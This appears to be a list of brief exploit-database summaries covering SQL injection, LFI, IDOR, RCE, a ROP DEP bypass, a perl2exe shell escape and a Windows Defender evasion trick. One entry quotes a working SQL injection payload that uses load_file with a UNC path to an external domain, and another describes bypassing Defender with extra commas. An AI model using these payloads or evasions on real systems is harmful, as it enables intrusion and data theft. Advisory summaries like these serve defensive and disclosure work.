perl2exe allows packing Perl scripts into native executables that use the 0th argument to unpack and execute a file. An attacker can leverage this to make the executable run another compiled executable by controlling the 0th argument, enabling them to escape restricted shell environments.
Client Details System 1.0 is vulnerable to SQL Injection through the 'uemail' parameter in the '/clientdetails/' endpoint. An attacker can exploit this vulnerability to compromise the application, access or manipulate data, or target the underlying database for further exploitation.
The Curfew e-Pass Management System 1.0 is vulnerable to SQL injection in the 'FromDate' parameter. By injecting a malicious payload into the 'FromDate' parameter, an attacker can manipulate the SQL query to execute arbitrary SQL commands. This vulnerability has been tested with a time-based blind technique using MySQL version 5.0.12.
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query to call MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve sensitive information of clients and access server data.
The exploit bypasses Data Execution Prevention (DEP) in A-PDF All to MP3 Converter version 2.0.0 by utilizing HeapCreate, HeapAlloc, and some_memory_copy_function ROP chain. By manipulating specific parameters and memory allocations, an attacker can execute arbitrary code on the target system.
The Local File Inclusion vulnerability in WordPress WP Rocket Plugin allows an attacker to include local files from the target website, potentially exposing sensitive information like database credentials and enabling a complete database takeover. This issue was fixed in version 2.10.4.
The exploit allows an attacker to perform an Account Takeover by manipulating the 'id' parameter in the URL of the 'Users.php?f=save' endpoint in Lost and Found Information System v1.0. By changing the 'id' parameter, an attacker can access other user accounts without proper authorization. This vulnerability has been assigned CVE-2023-38965.
The Easywall 0.3.1 software is prone to an authenticated remote command execution vulnerability. By exploiting this issue, a remote attacker who has authenticated access to the application can execute arbitrary commands on the target system. This can lead to complete compromise of the system.
Windows Defender usually prevents the execution of TrojanWin32Powessere.G by leveraging rundll32.exe. However, by using multiple commas in the execution command, the mitigation can be bypassed, allowing successful execution of the trojan.
The exploit allows an attacker to perform SQL injection in the Enrollment System v1.0 application by manipulating the 'emc' parameter in the '/get_subject.php' URI. By injecting a crafted payload, an attacker can retrieve sensitive information from the database. This vulnerability has a CVE identifier.
Services By CQR